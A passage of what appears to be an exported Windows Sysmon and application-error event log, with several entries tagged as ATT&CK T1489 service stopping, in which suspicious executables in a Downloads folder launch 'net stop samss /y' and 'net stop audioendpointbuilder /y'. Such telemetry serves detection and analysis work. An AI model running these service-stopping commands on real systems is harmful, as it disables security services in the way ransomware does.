path: C:\Windows\System32\RuntimeBroker.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 036530cd-198c-4ed1-8988-ab9b151b6211 +Faulting package full name: +Faulting package-relative application ID: """,, +"May 23, 2020 @ 12:38:57.133",9,"Windows Application error event","""Faulting application name: svchost.exe, version: 10.0.18362.1, time stamp: 0x32d6c210 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xc60 +Faulting application start time: 0x01d6303b4f421e75 +Faulting application path: C:\Windows\system32\svchost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 946ba657-bd34-4b02-ba1a-50e461afe2ea +Faulting package full name: +Faulting package-relative application ID: """,, +"May 23, 2020 @ 12:38:46.198",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:37.336 +ProcessGuid: {df9fc3d3-d1a5-5ec7-0000-00104d192700} +ProcessId: 104352 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1a3-5ec7-0000-0010dab72600} +ParentProcessId: 102756 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:37.408323700Z"",""eventRecordID"":""1114"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:37.336\r\nProcessGuid: {df9fc3d3-d1a5-5ec7-0000-00104d192700}\r\nProcessId: 104352\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1a3-5ec7-0000-0010dab72600}\r\nParentProcessId: 102756\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:37.336"",""processGuid"":""{df9fc3d3-d1a5-5ec7-0000-00104d192700}"",""processId"":""104352"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1a3-5ec7-0000-0010dab72600}"",""parentProcessId"":""102756"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:38:44.653",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:35.758 +ProcessGuid: {df9fc3d3-d1a3-5ec7-0000-00108dcb2600} +ProcessId: 102880 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1a3-5ec7-0000-0010c89e2600} +ParentProcessId: 102620 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:35.793568100Z"",""eventRecordID"":""1110"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:35.758\r\nProcessGuid: {df9fc3d3-d1a3-5ec7-0000-00108dcb2600}\r\nProcessId: 102880\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1a3-5ec7-0000-0010c89e2600}\r\nParentProcessId: 102620\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:35.758"",""processGuid"":""{df9fc3d3-d1a3-5ec7-0000-00108dcb2600}"",""processId"":""102880"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1a3-5ec7-0000-0010c89e2600}"",""parentProcessId"":""102620"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:38:43.581",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:35.458 +ProcessGuid: {df9fc3d3-d1a3-5ec7-0000-0010dab72600} +ProcessId: 102756 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:35.479790400Z"",""eventRecordID"":""1109"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:35.458\r\nProcessGuid: {df9fc3d3-d1a3-5ec7-0000-0010dab72600}\r\nProcessId: 102756\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:35.458"",""processGuid"":""{df9fc3d3-d1a3-5ec7-0000-0010dab72600}"",""processId"":""102756"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:38:43.564",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:35.139 +ProcessGuid: {df9fc3d3-d1a3-5ec7-0000-0010c89e2600} +ProcessId: 102620 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:35.184575300Z"",""eventRecordID"":""1108"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:35.139\r\nProcessGuid: {df9fc3d3-d1a3-5ec7-0000-0010c89e2600}\r\nProcessId: 102620\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:35.139"",""processGuid"":""{df9fc3d3-d1a3-5ec7-0000-0010c89e2600}"",""processId"":""102620"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:38:41.805",9,"Windows Application error event","""Faulting application name: GameBarFTServer.exe, version: 3.38.2002.25003, time stamp: 0x5e5603d7 +Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 +Exception code: 0xc0000005 +Fault offset: 0x00007ff75b59e38d +Faulting process id: 0x18b0 +Faulting application start time: 0x01d6303b6919b3f9 +Faulting application path: C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe\GameBarFTServer.exe +Faulting module path: unknown +Report Id: 14cdca0f-6a98-4c3b-ab89-acde7038f8e1 +Faulting package full name: Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe +Faulting package-relative application ID: App""",, +"May 23, 2020 @ 12:38:34.234",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:26.104 +ProcessGuid: {df9fc3d3-d19a-5ec7-0000-001061332500} +ProcessId: 88516 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation 
+OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d198-5ec7-0000-001007f72400} +ParentProcessId: 86532 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:26.147811400Z"",""eventRecordID"":""1103"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:26.104\r\nProcessGuid: {df9fc3d3-d19a-5ec7-0000-001061332500}\r\nProcessId: 88516\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d198-5ec7-0000-001007f72400}\r\nParentProcessId: 86532\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:26.104"",""processGuid"":""{df9fc3d3-d19a-5ec7-0000-001061332500}"",""processId"":""88516"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d198-5ec7-0000-001007f72400}"",""parentProcessId"":""86532"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:38:34.217",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:25.908 +ProcessGuid: {df9fc3d3-d199-5ec7-0000-00108c302500} +ProcessId: 88508 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop 
""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d197-5ec7-0000-001040e52400} +ParentProcessId: 85008 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:26.102796300Z"",""eventRecordID"":""1102"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:25.908\r\nProcessGuid: {df9fc3d3-d199-5ec7-0000-00108c302500}\r\nProcessId: 88508\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d197-5ec7-0000-001040e52400}\r\nParentProcessId: 85008\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:25.908"",""processGuid"":""{df9fc3d3-d199-5ec7-0000-00108c302500}"",""processId"":""88508"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d197-5ec7-0000-001040e52400}"",""parentProcessId"":""85008"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:38:32.964",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:24.042 +ProcessGuid: {df9fc3d3-d198-5ec7-0000-001007f72400} +ProcessId: 86532 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe 
+CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" 